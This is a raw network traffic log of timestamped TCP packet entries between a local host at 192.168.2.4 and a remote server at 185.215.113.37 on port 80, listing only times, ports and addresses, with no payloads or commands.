Oct 10, 2024 18:23:20.885957956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.885958910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885958910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.885986090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886015892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886029959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886032104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886048079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886073112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886073112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886116028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886156082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886167049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886184931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886198997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886203051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886203051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886215925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886229038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886234999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886234999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886260033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886265993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886265993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886435986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886445999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886462927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886476040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886476040 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886476040 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886495113 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886509895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886523008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886538029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886544943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886544943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886550903 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886567116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886580944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886589050 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886589050 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886713028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886776924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886782885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886790991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886805058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886827946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886881113 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886895895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886919022 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886925936 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886925936 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.886934996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.886951923 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.887242079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.887258053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.887269020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.887288094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.887299061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.887307882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.887307882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.887316942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.887330055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.887341022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.887341022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.887347937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.887360096 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.887394905 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.887394905 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888227940 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888246059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888262033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888279915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888365984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888381004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888398886 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888398886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888398886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888411999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888417006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888428926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888441086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888451099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888451099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888458014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888468981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888483047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888483047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888494015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888499975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888518095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888534069 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888540983 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888540983 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888546944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888564110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888580084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888581038 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888608932 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888624907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888641119 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888648033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888648033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888650894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888665915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888669968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888710022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888710022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888731956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888741970 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888758898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.888782024 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888782024 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.888962984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889097929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889108896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889132023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889156103 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889156103 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889208078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889218092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889235020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889239073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889239073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889249086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889256001 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889262915 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889278889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889292002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889292955 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889292955 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889343977 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889455080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889466047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889484882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889492989 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889494896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889516115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889528990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889542103 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889542103 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889547110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889579058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889591932 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889594078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889594078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889612913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889626026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889632940 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889642954 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889669895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889669895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:20.889760971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:20.889794111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010014057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010040998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010051012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010077953 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010080099 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010145903 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010149956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010149956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010157108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010207891 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010207891 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010374069 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010384083 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010401964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010407925 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010443926 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010443926 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010525942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010535955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010559082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010575056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010590076 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010590076 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010602951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010637999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010637999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010879040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010915995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.010916948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.010925055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011028051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011039019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011058092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011059999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011059999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011071920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011111975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011111975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011157990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011168957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011185884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011205912 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011205912 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011368036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011378050 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011379004 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011406898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011413097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011424065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011440992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011445999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011445999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011451960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011466980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011467934 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011481047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011496067 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011507988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011529922 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011537075 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011585951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011596918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011614084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011626005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011641026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011662006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011663914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011666059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011666059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011681080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.011692047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.011719942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.071029902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.076041937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.291826010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.291853905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.291867018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.291886091 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.291888952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.291903019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.291954994 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.291954994 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292117119 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292155027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292165995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292174101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292206049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292206049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292238951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292249918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292268991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292282104 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292299986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292304993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292304993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292375088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292385101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292403936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292404890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292421103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292431116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292431116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292459965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292469978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292488098 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292498112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292498112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292501926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292546034 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292546034 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292570114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292582989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292599916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292618036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292618036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292618990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292633057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292651892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292651892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292670965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292680979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292702913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292702913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292789936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292799950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292818069 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292849064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292849064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292879105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292889118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292905092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.292936087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.292936087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293004990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293035984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293132067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293200970 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293210983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293239117 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293239117 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293251991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293262005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293282032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293307066 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293307066 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293344021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293354034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293369055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293381929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293392897 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293392897 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293420076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293432951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293448925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293463945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293467999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293467999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293577909 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293626070 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293634892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293653011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293663979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293678999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293695927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293697119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293697119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293709040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293726921 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293735981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293744087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293744087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293752909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293776035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293864965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293874979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293891907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293898106 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293898106 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293901920 CEST	80	49731	185.215.113.37	192.168.2.4
